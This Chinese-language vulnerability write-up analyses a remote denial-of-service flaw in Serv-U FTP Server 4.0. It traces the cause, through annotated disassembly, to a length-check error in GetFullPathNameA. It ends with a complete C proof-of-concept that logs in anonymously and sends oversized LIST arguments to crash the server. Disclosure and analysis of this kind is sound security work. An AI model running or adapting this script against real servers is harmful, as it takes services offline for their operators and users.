Serv-U远程拒绝服务漏洞以及原因分析

涉及程序版本：

Serv-U FTP Server v4.0.0.4（以前版本也可能存在该漏洞，没有测试过）

漏洞类型：

远程拒绝服务

漏洞描述：

前几天使用了一下RhinoSoft出品的Serv-U FTP，感觉还不错，简单

测试了一下其安全性，发现当用匿名用户登陆后，发送LIST NNNN...命令，

后跟的字符数量达到253字节时，服务端报错，并且错误对话框无法关闭，

只能重启Serv-U FTP服务才行。

由于是由长字符串造成的，我一开始还认为是溢出之类的漏洞。后来

经过深入分析程序汇编代码，发现这不是一般的溢出，甚至可以说不是

Serv-U的本身程序的问题，而是一个WIN32 API的设计上的BUG。

GetFullPathNameA这个API用来获取指定文件的路径，但是它在处理

长文件名时没有考虑好边界条件，造成可能访问到不存在的内存地址，

在Serv-U的例子里就造成了拒绝服务攻击。本来一般像这种访问不存在

内存的漏洞，程序的异常处理都可以恢复过来的，不至于造成程序崩溃，

但是正是由于这个问题是由系统DLL出错而造成的，而不是应用程序本身

的问题，所以应用程序的异常处理例程无法正确处理该问题，从而导致了

服务端程序崩掉。

不仅仅是LIST命令受该漏洞影响，所有后跟参数是文件名的命令都有

这个问题，例如MDTM等等。另外触发这个漏洞的串长度是根据ftp根目录的

设置不同而定的，我写了个程序来测试该漏洞，程序见后面。

由于这个漏洞无法用来得到权限，所以也懒得报告到BUGTRAQ上去了，

不过分析漏洞的过程还是让我有点收获，起码知道了编程中哪些地方是程

序员容易忽视而造成安全漏洞的地方，微软的程序员也一样犯这样的错误。

程序分析：

下面是通过对该程序的反汇编代码的分析来解释造成该漏洞的原因。

由于反汇编出的代码有几十M之大，分析的时候难免出错，敬请各位发现

问题的同志指出。

Serv-U在接受到LIST NNN...命令后对文件名进行处理，会进入下面

这一段程序：

* Referenced by a CALL at Addresses:

|:005A4A8F , :005A4C97

|

:005A338C 55 push ebp

:005A338D 8BEC mov ebp, esp

:005A338F 83C4F8 add esp, FFFFFFF8

:005A3392 53 push ebx

:005A3393 56 push esi

:005A3394 57 push edi

:005A3395 8B7D08 mov edi, dword ptr [ebp+08]

:005A3398 6804010000 push 00000104

:005A339D E802F9FEFF call 00592CA4

:005A33A2 59 pop ecx

:005A33A3 8BD8 mov ebx, eax

:005A33A5 85C0 test eax, eax

:005A33A7 7507 jne 005A33B0

:005A33A9 33C0 xor eax, eax

:005A33AB E9A9000000 jmp 005A3459

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:005A33A7(C)

|

:005A33B0 8D55FC lea edx, dword ptr [ebp-04]

:005A33B3 52 push edx

:005A33B4 53 push ebx

:005A33B5 6804010000 push 00000104

:005A33BA 8B4D0C mov ecx, dword ptr [ebp+0C]

:005A33BD 51 push ecx ;这里是ftp跟目录加上LIST参数

* Reference To: KERNEL32.GetFullPathNameA, Ord:0000h

|

:005A33BE E89F630100 Call 005B9762 ;调用GetFullPathNameA

;-------------------------------------------------------------------------------------------

;调用到Kernel32.dll里的GetFullPathNameA函数

Exported fn(): GetFullPathNameA - Ord:012Ah

:77E80DBD 55 push ebp

:77E80DBE 8BEC mov ebp, esp

:77E80DC0 83EC24 sub esp, 00000024

:77E80DC3 53 push ebx

:77E80DC4 56 push esi

:77E80DC5 8B7514 mov esi, dword ptr [ebp+14]

:77E80DC8 33DB xor ebx, ebx

:77E80DCA F7DE neg esi

:77E80DCC 57 push edi

:77E80DCD 8D45FC lea eax, dword ptr [ebp-04]

:77E80DD0 FF7508 push [ebp+08]

:77E80DD3 895DF8 mov dword ptr [ebp-08], ebx

:77E80DD6 1BF6 sbb esi, esi

:77E80DD8 23F0 and esi, eax

:77E80DDA 8D45EC lea eax, dword ptr [ebp-14]

:77E80DDD 50 push eax

:77E80DDE E81E89FEFF call 77E69701

:77E80DE3 85C0 test eax, eax

:77E80DE5 0F84039C0000 je 77E8A9EE

:77E80DEB 64A118000000 mov eax, dword ptr fs:[00000018]

:77E80DF1 8B4030 mov eax, dword ptr [eax+30]

:77E80DF4 BF0A020000 mov edi, 0000020A ;长度限制，不正确！！！

;这里0x20A是分配的堆的大小，同时也作为后边判断RtlGetFullPathName_U

;返回长度的比较长度的限制

:77E80DF9 57 push edi

:77E80DFA FF35B0F7EB77 push dword ptr [77EBF7B0]

:77E80E00 FF7018 push [eax+18]

;分配0x20A字节的内存堆

* Reference To: NTDLL.RtlAllocateHeap, Ord:014Ah

|

:77E80E03 FF150410E677 Call dword ptr [77E61004]

:77E80E09 3BC3 cmp eax, ebx

:77E80E0B 8945F4 mov dword ptr [ebp-0C], eax

:77E80E0E 0F84C69B0000 je 77E8A9DA

:77E80E14 56 push esi

:77E80E15 50 push eax

:77E80E16 6808020000 push 00000208

:77E80E1B FF75F0 push [ebp-10]

;RtlGetFullPathName_U用来得到路径的UNICODE字符串，这个函数是由长度限制的，

;当长度大于0x208的时候无法正确得到路径，即无法正确拷贝串到ebp-0C中。

* Reference To: NTDLL.RtlGetFullPathName_U, Ord:01E7h

|

:77E80E1E FF15AC10E677 Call dword ptr [77E610AC]

:77E80E24 3BC7 cmp eax, edi ;这个判断不对，应该跳到错误处理去！

;但是由于前面的限制是0x20A，所以当用0x20A长的字符串时就会判断出错，

;不会进入错误处理去，而是继续对没有得到内容的堆内存进行后面的操作，

;这就是出错的根源

:77E80E26 894508 mov dword ptr [ebp+08], eax

:77E80E29 0F87CC9B0000 ja 77E8A9FB

* Reference To: NTDLL.RtlUnicodeToMultiByteSize, Ord:0294h

|

:77E80E2F 8B356010E677 mov esi, dword ptr [77E61060]

:77E80E35 50 push eax

:77E80E36 FF75F4 push [ebp-0C]

:77E80E39 8D4508 lea eax, dword ptr [ebp+08]

:77E80E3C 50 push eax

:77E80E3D FFD6 call esi ;call RtlUnicodeToMultiByteSize

:77E80E3F 3BC3 cmp eax, ebx

:77E80E41 0F8CAE9B0000 jl 77E8A9F5

:77E80E47 395D08 cmp dword ptr [ebp+08], ebx

:77E80E4A 0F8491000000 je 77E80EE1

:77E80E50 395D14 cmp dword ptr [ebp+14], ebx

:77E80E53 7420 je 77E80E75

:77E80E55 8B45FC mov eax, dword ptr [ebp-04]

:77E80E58 3BC3 cmp eax, ebx

:77E80E5A 7419 je 77E80E75

:77E80E5C 2B45F4 sub eax, dword ptr [ebp-0C]

:77E80E5F D1F8 sar eax, 1

:77E80E61 D1E0 shl eax, 1

:77E80E63 50 push eax

:77E80E64 8D45F8 lea eax, dword ptr [ebp-08]

:77E80E67 FF75F4 push [ebp-0C]

:77E80E6A 50 push eax

:77E80E6B FFD6 call esi ;call RtlUnicodeToMultiByteSize----出错！！！

;第2次调用RtlUnicodeToMultiByteSize的时候会把上面的错误显现出来

:77E80E6D 3BC3 cmp eax, ebx

:77E80E6F 0F8C809B0000 jl 77E8A9F5

;-------------------------------------------------------------------------------------------

最后一个call esi调用这里

Exported fn(): RtlUnicodeToMultiByteSize - Ord:0296h

:77F83EA4 8B44240C mov eax, dword ptr [esp+0C]

:77F83EA8 56 push esi

:77F83EA9 33F6 xor esi, esi

:77F83EAB D1E8 shr eax, 1

:77F83EAD 803D14F3FC7700 cmp byte ptr [77FCF314], 00

:77F83EB4 0F8598D30100 jne 77FA1252 ;会转到77FA1252去执行

:77F83EBA 8B4C2408 mov ecx, dword ptr [esp+08]

:77F83EBE 8901 mov dword ptr [ecx], eax

:77F83EC0 33C0 xor eax, eax

:77F83EC2 5E pop esi

:77F83EC3 C20C00 ret 000C

;-------------------------------------------------------------------------------------------

||||||跳到这里

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:77F83EB4(C)

|

:77FA1252 8BC8 mov ecx, eax

:77FA1254 48 dec eax

:77FA1255 85C9 test ecx, ecx

:77FA1257 7424 je 77FA127D

:77FA1259 8B4C240C mov ecx, dword ptr [esp+0C]

:77FA125D 57 push edi

:77FA125E 8D7801 lea edi, dword ptr [eax+01]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:77FA127A(C)

|

:77FA1261 0FB701 movzx eax, word ptr [ecx]

;这里会有个循环不断的取ecx的值，也就是前边RtlAllocateHeap分配的那个堆，

;因为前面那个堆里没有正确存放内容，所以会造成不跳出循环，从而一直取到

;内存页面不存在的地方，即0x00152000（也可能是别的值，由堆地址所定）。

:77FA1264 8B155404FD77 mov edx, dword ptr [77FD0454]

:77FA126A 41 inc ecx

:77FA126B 41 inc ecx

:77FA126C 668B0442 mov ax, word ptr [edx+2*eax]

:77FA1270 33D2 xor edx, edx

:77FA1272 8AD4 mov dl, ah

:77FA1274 84D2 test dl, dl

:77FA1276 7510 jne 77FA1288

:77FA1278 46 inc esi

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:77FA128A(U)

|

:77FA1279 4F dec edi

:77FA127A 75E5 jne 77FA1261

:77FA127C 5F pop edi

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:77FA1257(C)

|

:77FA127D 8B442408 mov eax, dword ptr [esp+08]

:77FA1281 8930 mov dword ptr [eax], esi

:77FA1283 E9382CFEFF jmp 77F83EC0

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:77FA1276(C)

|

:77FA1288 46 inc esi

:77FA1289 46 inc esi

:77FA128A EBED jmp 77FA1279

漏洞测试程序：

/*

Serv-U FTP Server 4.0 remote DoS

by isno(isno@xfocus.org)

*/

#include <stdio.h>

#include <winsock.h>

#pragma comment (lib,"Ws2_32")

void main(int argc, char *argv[])

{

//anonymous ftp user and passwd

char user[] = "USER ftp\r\n";

char pass[] = "PASS bug@rhinosoft.com\r\n";

char buff[1024];

int s, i;

struct hostent *ht;

struct sockaddr_in sin;

WSADATA WSAData;

if(argc != 2)

{

printf("Usage: %s host\r\n",argv[0]);

exit(0);

}

if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)

{

printf("WSAStartup failed.\n");

WSACleanup();

exit(1);

}

if((ht = gethostbyname(argv[1])) == 0)

{

printf("cannot resolve %s\n",argv[1]);

exit(1);

}

sin.sin_port = htons(21);

sin.sin_family = AF_INET;

sin.sin_addr = *((struct in_addr *)ht->h_addr);

if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)

{

printf("cannot setup socket\r\n");

exit(1);

}

if((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1)

{

printf("cannot connect\r\n");

exit(1);

}

memset(buff,0,sizeof(buff));

if(recv(s, buff, 200, 0) == -1)

{

printf("cannot recv\r\n");

exit(1);

}

printf("%s\r\n",buff);

printf("%s\r\n",user);

memset(buff,0,sizeof(buff));

if(send(s, user, strlen(user), 0) == -1)

{

printf("cannot send\r\n");

exit(1);

}

memset(buff,0,sizeof(buff));

if(recv(s, buff, 200, 0) == -1)

{

printf("cannot recv\r\n");

exit(1);

}

printf("%s\r\n",buff);

printf("%s\r\n",pass);

memset(buff,0,sizeof(buff));

if(send(s, pass, strlen(pass), 0) == -1)

{

printf("cannot send\r\n");

exit(1);

}

memset(buff,0,sizeof(buff));

if(recv(s, buff, 200, 0) == -1)

{

printf("cannot recv\r\n");

exit(1);

}

printf("%s\r\n",buff);

//try long para from 200 to 300 bytes

for(i=200;i<300;i++)

{

printf("send LIST NNN...(%d bytes)\r\n",i);

memset(buff,0,sizeof(buff));

memcpy(buff,"LIST ",5);

memset(buff+5,0x4e,i);

memcpy(buff+5+i,"\r\n",2);

if(send(s, buff, strlen(buff), 0) == -1)

{

printf("cannot send\r\n");

exit(1);

}

memset(buff,0,sizeof(buff));

if(recv(s, buff, 200, 0) == -1)

{

printf("0verflow!\r\n");

return;

}

}

closesocket(s);

printf("target is not vuln\r\n");

return;

}

• ·ProFTPD + MySQL + mod_q
• ·网管员安全训练营--让FTP服务器更安全
• ·让你的SERV-U FTP看起来更专业一点
• ·如何利用ftpvsetup FTP上传文件、以
• ·Serv-U服务器组建攻略
• ·Win2000中如何让FTP服务器更安全
• ·Linux下的FTP服务器配置
• ·用wu-ftpd架设FTP服务器
• ·企业内部FTP服务器的架设手册
• ·妙用FlashGet重入FTP服务器